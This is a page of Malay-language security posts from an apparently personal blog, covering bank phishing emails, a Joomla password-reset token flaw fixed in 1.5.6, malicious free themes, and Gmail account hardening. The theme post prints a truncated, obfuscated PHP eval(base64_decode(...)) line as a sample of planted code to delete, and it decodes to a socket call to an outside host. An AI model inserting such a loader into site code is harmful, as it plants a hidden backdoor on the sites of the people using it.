MohdHafez.net » Keselamatan

Jangan Jadi Mangsa Emel Daripada Bank

hafez — Tue, 12 Jan 2010 00:04:34 +0000

Seperti anda sedia maklum, kebanyakkan bank di negara ini telah menyediakan kemudahan online banking kepada pelanggannya. Antara online banking paling popular ketika ini adalah seperti Maybank2u dan CimbClick. Saya pasti kebanyakkan daripada anda pernah membuat sekurang-kurangnya sekali transaksi menerusi online banking. Tidak perlulah dinyatakan di sini betapa kemudahan online banking ini amat membantu dan memudahkan urusan anda dengan bank selama ini.

Namun, disebalik keselesaan dalam menggunakan online banking, terdapat ancaman yang anda perlu sentiasa berwaspada. Antaranya adalah seperti emel seperti ini.

Kelihatan seperti emel rasmi yang dihantar oleh bank itu sendiri. Namun jika diperhatikan pada pautan dalam emel ini, anda sebenarnya akan dibawa ke sebuah laman web phishing. Jika bernasib baik, pautan tersebut mungkin telah disaring oleh Suruhanjaya Komunikasi & Multimedia Malaysia menerusi program antiphishingnya. Jika tidak, kemungkinan maklumat perbankan anda akan ~~diragut~~ dicuri dan anda akan kehilangan wang dengan sekelip mata.

Jadi berwaspadalah dengan emel-emel sebegini. Pihak bank biasanya akan menghantar surat, tidak melalui emel sebegini kepada anda.

Share on Facebook

Joomla! 1.5.6 Tangani Masalah Token

hafez — Wed, 13 Aug 2008 00:49:31 +0000

Hari ini komuniti Joomla! telah mengumumkan Joomla! siri 1.5.6 (Vusani) telah sedia untuk dipindahturun. Versi ini adalah untuk menangani isu keselamatan tahap tinggi di mana terdapat masalah di dalam fungsi untuk mengingati kata laluan dan disarankan agar semua pengguna Joomla! upgrade Joomla! masing-masing dengan segera.

Masalah di dalam versi sebelum ini dilaporkan:

A flaw in the reset token validation mechanism allows for non-validating tokens to be forged. This will allow an unauthenticated, unauthorized user to reset the password of the first enabled user (lowest id). Typically, this is an administrator user. Note, that changing the first users username may lessen the impact of this exploit (since the person who changed the password does not know the login associated with the new password). However, the only way to completely rectify the issue is to upgrade to 1.5.6 (or patch the /components/com_user/models/reset.php file).
For more information about this exploit, visit the Joomla Security Blog http://developer.joomla.org/security.html.

Download : Joomla! 1.5.6 (5,889 Kb) | Upgrade

Share on Facebook

Jangan Download Themes Percuma

hafez — Fri, 25 Jul 2008 01:00:30 +0000

Adakah anda menggunakan themes WordPress/Joomla percuma di blog anda? Jika ya, sila uninstall themes anda sekarang dan gunakan default themes sahaja. Seandainya anda berhasrat untuk menukar themes blog anda, pastikan anda tidak menukarnya dengan themes yang diperolehi secara percuma daripada internet dengan sewenang-wenangnya. Ingat! yang percuma itu tidak selalunya baik dan menguntungkan anda.

Tahukah anda, terdapat sebilangan themes yang menarik dan percuma sebenarnya mengandungi malicious code yang mampu melakukan pelbagai aktiviti ~~haram~~ seperti menjejaki pengunjung blog anda dan berkebolehan untuk memaparkan iklan-iklan yang tidak sepatutnya. Themes ini juga akan menjana kod tertentu untuk menghasilkan spam atau phishing melalui blog anda tanpa anda sedari.

Jika anda tidak mampu untuk membeli themes, mungkin kerana themes kesukaan anda terlalu mahal atau anda ingin berjimat cermat anda sebenarnya masih lagi boleh menggunakan themes percuma. Syaratnya, pastikan themes tersebut diperolehi daripada pihak yang menciptanya sendiri yang diyakini benar dan bukan terus melalui pihak ketiga. Kebiasaannya themes-themes percuma ini lebih mudah didapati daripada blog pihak ketiga yang membuat koleksi themes percuma berbanding daripada blog pencipta themes itu sendiri.

Selain itu, jika anda ~~fasih~~ memahami bahasa html atau php, cuba teliti kod-kod yang ada di dalam di dalam themes anda. Pastikan tiada kod yang pelik seperti di bawah, jika ada hapuskan sahaja kod tersebut. Themes percuma tidak memerlukan kod yang dienkrip seperti ini:

@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\’));

P/s: Suatu hari saya juga akan membeli themes sendiri, atau mungkin menciptanya sendiri.

Share on Facebook

Gmail Tidak Selamat

hafez — Fri, 28 Dec 2007 21:01:00 +0000

Memang benar, akaun Gmail tidak lagi selamat untuk digunakan. Jika anda menggunakannya sekarang, anda mungkin perlu cari alternatif lain. Saya ada sebab yang munasabah untuk berkata demikian.

Saya adalah antara pengguna setia akaun percuma Gmail, dan hampir semua emel-emel saya yang penting terkandung di dalam akaun gmail. Bagaimana pun setelah saya terbaca kisah malang yang menimpa David Airey baru-baru ini , kepercayaan saya terhadap Gmail telah mula berubah. Saya faham tiada sebarang aplikasi yang boleh dijamin selamat digunakan 100%, tetapi kadang-kala apabila kita kerap(hampir setiap hari) menggunakan sesuatu aplikasi, kita tidak lagi akan mengsyaki atau curiga kepada tahap keselamatannya.

Saya bersyukur kerana perkara buruk yang dialami oleh David tidak berlaku kepada saya, kalau tidak mungkin saya sekarang sedang menghadapi trauma. Bagaimana pun tidaklah saya berniat untuk menamatkan terus perkhidmatan Gmail yang telah banyak berjasa selama ini, cuma saya lebih berhati-hati. Kata orang, beringat-ingat sebelum terlewat. Berikut adalah langkah-langkah awal yang saya telah ambil:
1. Menukar password kepada yang lebih sukar iaitu gabungan nombor, huruf dan simbol.
2. Backup akaun dan emel-emel yang mengandungi maklumat sulit disalin atau dicetak dan seterusnya dihapuskan emel tersebut.
3. Fungi Filter digunakan untuk membuat saringan terhadap emel-emel yang masuk dan emel yang tidak dikenali akan ditandakan sebagai spam dan sekiranya meragukan tidak akan dibuka langsung sebaliknya terus dihapuskan.
4. Folder Drafts, Trash dan Send Mail dikosongkan.
5. Setiap emel yang diterima akan dipastikan siapa penghantarnya dengan klik pada show details.
6. Disable fungsi Forwarding and POP/IMAP di Settings.
7. Memastikan Sign Out digunakan untuk menutup emel.

Mungkin anda merasakan tindakan saya agak paranoid dan agak keterlaluan, namun sekurang-kurangnya hidup saya selepas ini lebih tenteram. Sekiranya berlaku pencerobohan, akibat yang ditanggung tidaklah seteruk mana dan juga tidaklah merugikan sangat. Saya pasti anda mempunyai pendapat berbeza, silalah kongsi disini yer?.

Share on Facebook